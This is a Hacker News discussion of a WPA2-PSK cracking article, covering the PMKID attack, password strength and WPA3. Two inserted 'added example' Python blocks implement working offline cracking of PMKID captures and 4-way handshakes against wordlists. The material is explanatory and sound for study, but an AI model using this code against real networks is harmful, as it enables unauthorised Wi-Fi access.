
Cracking WPA-2 Just Got a Whole Lot Easier - iou
https://medium.com/@billbuchanan_27654/the-beginning-of-the-end-of-wpa-2-cracking-wpa-2-just-got-a-whole-lot-easier-55d7775a7a5a
======
dsp1234
Note that the beginning of the article quickly mentions the new attack that
doesn't require the 4-way handshake. Then the rest of the article describes
the 4-way handshake attack.

Here is the source for information on the attack that only requires a single
EAPOL frame[0].

 _" This attack was discovered accidentally while looking for new ways to
attack the new WPA3 security standard. WPA3 will be much harder to attack
because of its modern key establishment protocol called "Simultaneous
Authentication of Equals" (SAE).

The main difference from existing attacks is that in this attack, capture of a
full EAPOL 4-way handshake is not required. The new attack is performed on the
RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this
technique will work, but we think it will work against all 802.11i/p/q/r
networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follows:

- No more regular users required - because the attacker directly communicates
  with the AP (aka "client-less" attack)
- No more waiting for a complete 4-way handshake between the regular user and
  the AP
- No more eventual retransmissions of EAPOL frames (which can lead to
  uncrackable results)
- No more eventual invalid passwords sent by the regular user
- No more lost EAPOL frames when the regular user or the AP is too far away
  from the attacker
- No more fixing of nonce and replaycounter values required (resulting in
  slightly higher speeds)"_ [0]

[0] -
[https://hashcat.net/forum/thread-7717.html](https://hashcat.net/forum/thread-7717.html)

~~~
sctb
And discussed here:
[https://news.ycombinator.com/item?id=17687700](https://news.ycombinator.com/item?id=17687700).

------
alanfranzoni
I'm not totally sure of what "cracking" means in this context. Without the
4-way handshake, what does "cracking" mean? Am I discovering the wifi network
password, or am I able to decrypt a client's WPA2-protected connection? That's
very different!

In WPA, in contrast with WEP, knowing a network's password does not
automatically let you sniff another client's traffic. So, the distinction is
quite interesting.

~~~
sp332
Thanks, that was something the article should have made more clear. The attack
gets you the wifi password but you still can't eavesdrop on other users.

------
chaosite
This seems to be the attack mentioned in the blog:
[https://hashcat.net/forum/thread-7717.html](https://hashcat.net/forum/thread-7717.html)

Basically it seems like there's a thing called PMKID, which is a HMAC-SHA1 of
the PMK and things we know, which you can get just by asking for it.
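
As an added example (not code from the hashcat post or from the article), here is what that description amounts to in Python: the PMKID the AP hands out is HMAC-SHA1 keyed with the PMK over a fixed label and the two MAC addresses, and recovering the passphrase is a plain offline PBKDF2 loop against that 16-byte value. The SSID, MAC addresses, passphrase and wordlist are constructed for illustration; the output line mirrors the PMKID*MAC_AP*MAC_STA*ESSID(hex) layout hashcat uses for mode 16800.

```python
"""Added example: what the 'client-less' PMKID attack computes and cracks.

Assumptions (not from the original thread): the SSID, passphrase, MAC
addresses and candidate wordlist below are constructed, not captured.
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    This is the expensive step and the only per-candidate cost when cracking."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of
    HMAC-SHA1 keyed with the PMK. Everything except the PMK is public: the AP
    advertises its MAC and the attacker chooses its own station MAC."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac(s: str) -> bytes:
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(s.replace(":", ""))


def hashcat_16800_line(pmkid_hex: str, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Render in the PMKID*MAC_AP*MAC_STA*ESSID(hex) layout of hashcat mode 16800."""
    return "*".join([pmkid_hex, ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, candidates):
    """Offline dictionary attack: one PBKDF2 plus one HMAC per candidate, then a
    16-byte comparison. No 4-way handshake, nonces or replay counters involved."""
    for cand in candidates:
        if hmac.compare_digest(pmkid(derive_pmk(cand, ssid), ap_mac, sta_mac), target):
            return cand
    return None


# Constructed scenario (not a real capture): the "AP" computes the PMKID from the
# real passphrase, which is exactly what an attacker receives in the first
# EAPOL frame after associating with its own station MAC.
SSID = "HomeNet"
AP_MAC = mac("00:11:22:33:44:55")
STA_MAC = mac("66:77:88:99:aa:bb")
CAPTURED_PMKID = pmkid(derive_pmk("L4vend3rB1ue", SSID), AP_MAC, STA_MAC)
WORDLIST = ["password", "letmein", "L4vend3rB1ue", "kGsunI68$@4g"]

if __name__ == "__main__":
    print(hashcat_16800_line(CAPTURED_PMKID.hex(), AP_MAC, STA_MAC, SSID))
    print("recovered:", crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST))
```

The loop body is the whole cost model from the quoted hashcat post: a candidate is confirmed or rejected with one PBKDF2 (4096 HMAC-SHA1 rounds) and one short HMAC, with nothing from a client session to align first. A passphrase outside the candidate list, like the random one further down the thread, is never reached by this loop; only guessable passphrases are at risk.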

------
cmurf
Is there a new hardware dependency for supporting WPA3? Or could most existing
802.11ac era APs be firmware flashed to support WPA3? (Setting aside the
business case where there's probably insufficient economies of scale for paid
software upgrades for existing hardware that would enable WPA3, rather than
just selling a new product.)

~~~
semi-extrinsic
From browsing the DD-WRT forums it seems very likely that new hardware
(802.11ax support specifically) will be required. If not in theory, at least
in practice.

------
criddell
Near the end of the video didn't he supply the password (Ankle123)? If so,
what was actually cracked?

I have a reasonably strong password on my wifi (it looks something like
"OwEs3PMY7yk6qwR4ic"). Is this crackable with this guy's setup in a couple of
days?

~~~
semi-extrinsic
No. They use Hashcat to generate a large table of keys based on a dictionary +
permutations. So "L4vend3rB1ue" is likely crackable in a few days, whereas
"kGsunI68$@4g" is not.

Also, they say "with a reasonably priced GPU cracking infrastructure, many
systems can be cracked within a few days."

I take this to mean they're using something of the order of magnitude of a
couple K80 instances on Google Cloud, which will cost $25 per day. By no means
prohibitive if you want to try and crack one specific WiFi, but too expensive
for wardriving etc.

~~~
tzs
This reminds me of something I've wondered about with brute force cracking.

Suppose Alice uses a 14 character password, each character chosen at random
from the range [U+0021, U+007E] (e.g., the 94 printable ASCII characters above
space). There are 4.21x10^27 or 2^91.8 possible passwords for Alice.

Bob, on the other hand, uses a 20 character password, also chosen at random,
but Bob used a much smaller character set. He just used the 10 ASCII digits.
There are 1x10^20 or 2^66.4 possible passwords for Bob. (Bob would need 28
digits for his password space to be as large as Alice's).

Bob's passwords come from a much smaller set, and so could be brute forced
much faster--if the attacker knew that they only had to search that much
smaller set. In most cases, though, the attacker will not know that.

But, a lot of people do use reduced character sets, so I'd expect brute force
attackers to give some preference for searching those first--but how much?
Would they be likely to find Bob's 20 character all numeric password ahead of
Alice's 14 character all-94 password?

~~~
Dylan16807
> But, a lot of people do use reduced character sets, so I'd expect brute
> force attackers to give some preference for searching those first--but how
> much?

The correct answer is that it barely matters.

So an Alice password is worth 27.6 digits and if you went in order of entropy
you'd try them after you try 27 digit passwords.

Let's say you think it's overwhelmingly likely that a password is Alice-style,
maybe 99% likely. This suggests that you devote 1% of your processing power to
Bob style. Instead of trying Alice-style passwords after you try 27 digit
passwords, you will try them after... 25 digit passwords

Because the difficulty increases exponentially, devoting just a smidge of
processing power to each different kind means that your progress goes roughly
in order of increasing entropy.

And Bob's password will be cracked first, since "digits" is a very reasonable
category to devote some computation to.

------
discreditable
WPA2's day is past imho. It's a shame that WPA3 looks like it might have its
own problems thanks to closet development.

------
fixermark
This story might want a caveat: "If the password doesn't change frequently."

I think most people still don't think of "Key can be brute-forced in a few
days of offline processing" as "owned," necessarily.

~~~
close04
"Several days" is orders of magnitude less than the interval between most
password changes. The vast majority of users _never_ change their WiFi
password unless they get a new router.

------
danmg
This isn't new. mode 2501 cracking in hashcat has been there for over a year.

------
voxadam
It seems like it might be time to configure my mobile devices (e.g. phones and
laptops) to use my newly configured Wireguard VPN even when using my own
WPA2-PSK (AES) wifi at home.

~~~
sp332
You can't eavesdrop on other wifi users with this attack. This just gets you
the wifi password.

Edit: There is another kind of attack that could extend this though. An
attacker sets up an AP with the same SSID, and the same password (using the
new attack). Then they kick you off the real network with a deauth attack and
hope your device reconnects to theirs.

~~~
Fnoord
WPA2 doesn't have forward secrecy [1]

[1] [https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#Lack_of...](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#Lack_of_forward_secrecy)

~~~
sp332
I'm not an expert, but wouldn't they have to sniff the four-way handshake for
that to work? This new attack specifically doesn't do that.
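
The key derivation behind that exchange, as an added example that is not part of the thread: each session's PTK is derived from the PMK together with the ANonce and SNonce from that session's 4-way handshake, so holding the PSK alone (from a PMKID crack, say) gives no traffic keys, while holding the PSK plus a captured handshake reproduces that client's KCK and TK, which is the missing forward secrecy. The SSID, passphrase, MACs, nonces and the EAPOL-Key frame are constructed for illustration (the frame follows the EAPOL-Key layout only approximately).

```python
"""Added example (not from the thread or from hashcat): PSK + captured 4-way
handshake -> per-session keys; PSK alone -> nothing decryptable.

All inputs below are constructed stand-ins, not captured data.
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes):
    """PTK = PRF-384(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces)).
    For CCMP the 48 bytes split into KCK (16), KEK (16), TK (16)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_sha1(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1-128(KCK, EAPOL-Key frame
    with its 16-byte MIC field set to zero)."""
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, frame_mic_zeroed, captured_mic, candidates):
    """Classic handshake attack: needs both nonces and a MIC'd frame from a real
    client's session, on top of the public MACs."""
    for cand in candidates:
        kck, _, _ = derive_ptk(derive_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, frame_mic_zeroed), captured_mic):
            return cand
    return None


# --- constructed "capture" (stand-in values, not real traffic) ---------------
SSID = "HomeNet"
PASSPHRASE = "L4vend3rB1ue"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))            # stand-in for the AP's random nonce (msg 1)
SNONCE = bytes(range(32, 64))        # stand-in for the client's random nonce (msg 2)
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP
FRAME_MIC_ZEROED = (
    bytes.fromhex("0103007502010a0000")     # 802.1X hdr, RSN descriptor, key info, key len
    + (1).to_bytes(8, "big")                # replay counter
    + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
    + b"\x00" * 16                          # MIC field zeroed for the computation
    + len(RSN_IE).to_bytes(2, "big") + RSN_IE
)
CAPTURED_MIC = eapol_mic(
    derive_ptk(derive_pmk(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[0],
    FRAME_MIC_ZEROED,
)
WORDLIST = ["password", "letmein", PASSPHRASE]


def session_keys_differ() -> bool:
    """Same PSK, new ANonce -> different TK: the PSK alone never yields a
    client's traffic key, the handshake nonces are required."""
    pmk = derive_pmk(PASSPHRASE, SSID)
    tk_a = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[2]
    tk_b = derive_ptk(pmk, AP_MAC, STA_MAC, bytes(range(64, 96)), SNONCE)[2]
    return tk_a != tk_b


if __name__ == "__main__":
    print("recovered:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                        FRAME_MIC_ZEROED, CAPTURED_MIC, WORDLIST))
    print("new ANonce gives a new TK:", session_keys_differ())
```

Read together with the two comments above: the PMKID path stops at the PMK, while decrypting a given client requires its ANonce/SNonce from a captured handshake (or the evil-twin trick mentioned earlier, where the attacker runs the AP side and therefore sees both nonces directly).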

------
Qub3d
Is it bad that I want to go make a wardriving setup again?

------
Fnoord
This is about WPA2-PSK (aka WPA2-Personal), not WPA2 (aka WPA2-Enterprise).
PSK was already vulnerable to brute force attacks. It always is.

------
tunesmith
Any recommendations on what an Airport Extreme user should move on to if
they're looking for something similarly easy to set up?

~~~
givinguflac
I’ve yet to find a router that is as easy to set up and works as well. Asus
routers are decent if you spend the time to configure, but there are tons of
options. I use Asus with the Merlin open firmware and it’s great. I’m not
aware of any router that supports wpa3 yet.

Edit: FWIW, mesh is the new hype, but it still can’t beat wired access points.

------
nexact
Not every vendor is including RSN data. "A whole lot easier" is an
overstatement imo.

------
grendelt
> sparenly

?!

------
ozfive
Hahaha keep trying. I'm close to a solution to this wifi cracking problem!
Taking days or even hours won't be able to touch what I have...

~~~
yjftsjthsd-h
Would you care to share your approach?

~~~
jacoblambda
flip the router over and write down the password?

~~~
Joyfield
Write? What kind of savage are you? Take a picture of it.

~~~
ozfive
Good one!

